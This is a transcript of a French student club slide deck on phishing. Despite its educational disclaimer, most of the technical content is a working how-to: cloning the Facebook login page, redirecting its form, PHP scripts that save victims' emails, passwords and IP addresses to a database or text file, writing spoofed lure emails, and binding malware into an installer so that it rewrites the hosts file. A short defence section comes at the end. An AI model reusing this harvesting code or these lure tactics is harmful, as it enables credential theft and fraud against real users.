phishing

40
1

Upload: infocept

Post on 29-Jun-2015

136 views

Category:

Documents


0 download

DESCRIPTION

Présentation faite par Mohamed Amine RHOUMA et Marwen ZORGUI sur le phishing

TRANSCRIPT

Page 1: Phishing

1

Page 2: Phishing

Le Phishing

Elaboré par:

Mohamed Amine RHOUMA

Marwen ZORGUI

11/11/2011 2010

Le Club d’Informatique et du Logiciel Libre de l’Ecole

Polytechnique de Tunisie

2

Page 3: Phishing

Illegal

3

Page 4: Phishing

LOL …

4

Page 5: Phishing

Disclaimer

Cette présentation est à titre éducatif, Il est strictement illégal de l’appliquer à des fins

malhonnêtes.

5

Page 6: Phishing

PLAN

C’est quoi le Phishing??

Préparation nécessaire

Piéger la victime

Comment se protéger??

6

Page 7: Phishing

PLAN

C’est quoi le Phishing??

Préparation nécessaire

Piéger la victime

Comment se protéger??

7

Page 8: Phishing

Définition

• Concaténation de phreaking (piratage des systèmes téléphoniques) et fishing (pêche)

• « Aller à la pèche aux informations »

• Connu aussi avec Hameçonnage et Filoutage

• Technique utilisée par les fraudeurs pour obtenir des renseignements personnels

8

Page 9: Phishing

Principe de l’attaque

SITE FACTICE:

La victime croît être sur un site de confiance pour saisir ses données personnelles, mais en réalité il est en train de les envoyer au pirate informatique

9

Page 10: Phishing

Principe

Accès à la page trompeuse

Saisie des informations confidentielles

Enregistrement des données par le criminel

10

Page 11: Phishing

Quelques statistiques…

• En 2007,le Phishing a rapporté 3.2 milliards de dollars aux pirates

• Sites victimes de Phishing : tous les sites contenant des données personnelles, surtout bancaires (PayPal, Facebook, SNCF, CAF, …)

• 55.000 utilisateurs d'ordinateurs victimes d'arnaques de Phishing tous les mois dans le monde

11

Page 12: Phishing

PLAN

C’est quoi le Phishing??

Préparation nécessaire

Piéger la victime

Comment se protéger??

12

Page 13: Phishing

Préparation nécessaire

Création de la page trompeuse

Stockage des données

13

Page 14: Phishing

Création de la page trompeuse

Enregistrement de la page originale avec les images et les autres fichiers (CSS : CascadingStyle Sheets, JavaScript…)

14

Page 15: Phishing

Création de la page trompeuse

• Modifier le code source de la page trompeuse et plus précisément l’attribut ACTION de la balise <FORM>

• Firebug : module complémentaire pour Firefox

15

Page 16: Phishing

Edition avec Firebug

16

Page 17: Phishing

Création de la page trompeuse

<formmethod ="POST" action="https://login.facebook.com/login.php?login_attempt=1"><input name="email" value="Adresse électronique" type="text"><input name="pass" type="password"></form>

Devient:

<form method="POST" action=“phishing.php" ><input name="email" value="Adresse électronique" type="text"><input name="pass" type="password"></form>

17

Page 18: Phishing

Préparation nécessaire

• On peut utiliser WAMPserver qui permet à notre machine de se comporter comme un serveur

• Une autre alternative est d’héberger notre page web sur la toile

18

Page 19: Phishing

Stockage des données

On dispose de plusieurs méthodes pour récupérer les données :

• Utilisation d’une Base de Données

• Utilisation d’un fichier.txt

• Utilisation de la fonction mailto

• Etc.

19

Page 20: Phishing

Base de données: création

20

Page 21: Phishing

Base de Données: code PHP

<?phpmysql_connect("localhost","root","");mysql_select_db("madrid");

$a=$_POST["email"];$b=$_POST["pass"];$c=$_SERVER["REMOTE_ADDR"];

$reponse=mysql_query("INSERT INTO tableau VALUES('','$a','$b','$c')") or die(mysql_error());

Header("Location: http://www.facebook.com/");

?>

21

Page 22: Phishing

Fichier TXT<?php

$fp = fopen("fichier.txt","a+");

fputs($fp,$_POST[email]);fputs($fp," ");fputs($fp,$_POST[pass]);fputs($fp," ");fputs($fp," ");fputs($fp,$_SERVER["REMOTE_ADDR"]);fputs($fp," ");

fclose($fp);

Header("Location:https://login.facebook.com/login.php?login_attempt=1");?>

22

Page 23: Phishing

PLAN

C’est quoi le Phishing??

Préparation nécessaire

Piéger la victime

Comment se protéger??

23

Page 24: Phishing

24

Page 25: Phishing

Piéger la victime

Mail piège

Fichier hosts

DNS Cache poisoning

Etc.

25

Page 26: Phishing

Mail piège

Simple, rapide et efficace

• Créer une adresse mail imitant un tiers de confiance(adresses jetables, faux mail…), par [email protected]

• Reproduire le logo de la société dont on usurpel’identité.

• Trouver un prétexte pour que les victimes se rendent sur le site factice, pour y entrer leurs infos personnelles.

• Envoyez le mail piégeur à autant de gens que possible.

26

Page 27: Phishing

Fichier hosts

• Dans le dossier :

C:\Windows\System32\drivers\etc

• Consultation de ce fichier avant l'accès au serveur DNS

• Permet au système de connaitre l'adresse IP associée au nom de domaine sans avoir recours à une requête DNS

27

Page 28: Phishing

Fichier hosts

• Attaque par .rar dont l’extraction remplace le fichier hosts

• Attaque par fichier .exe dont l’installation va modifier le fichier hosts (Binder)

28

Page 29: Phishing

Binder : principe

VLC.exe virus.exe

VLC.exe(Piégeant)

29

Page 30: Phishing

Fichier hosts

Linux empêche toute sorte d’attaque

30

Page 31: Phishing

DNS Cache Poisoning

• Les serveurs DNS possèdent un cache permettant de garder pendant un certain temps la correspondance entre un nom de machine et son adresse IP

• Le DNS Cache Poisoning consiste à corrompre ce cache avec de fausses informations

31

Page 32: Phishing

Bref

• Mail piége

• Fichier Hosts

• DNS Cache poisoning

• …

32

Page 33: Phishing

PLAN

C’est quoi le Phishing??

Préparation nécessaire

Piéger la victime

Comment se protéger??

33

Page 34: Phishing

Comment se protéger??

• Assurez-vous, lorsque vous saisissez des informations sensibles, que le navigateur est en mode sécurisé (https)

34

Page 35: Phishing

Comment se protéger??

• S’assurer que le domaine du site dans l'adresse correspond bien à celui annoncé (Attention à l'orthographe du domaine)

• Se méfier des sites web de type http://41.229.1.181/facebook

• Vérifier les liens dans les mails même s’ils proviennent d’une source de confiance

35

Page 36: Phishing

Comment se protéger??

• Il faut être particulièrement vigilant lorsque l'on rencontre une adresse Web contenant le symbole « @ »

Par exemple l'adresse http://[email protected]/

mène à 41.229.0.170 et non pas à www.facebook.com comme on pourrait le croire

36

Page 37: Phishing

Comment se protéger??

• Ne Télécharger les programmes que depuis des sites officiels

• Utiliser un antivirus

37

Page 38: Phishing

Surprise!!

Notre première victime a été ….

38

Page 39: Phishing

39

Page 40: Phishing

Merci pour votre attention !!

40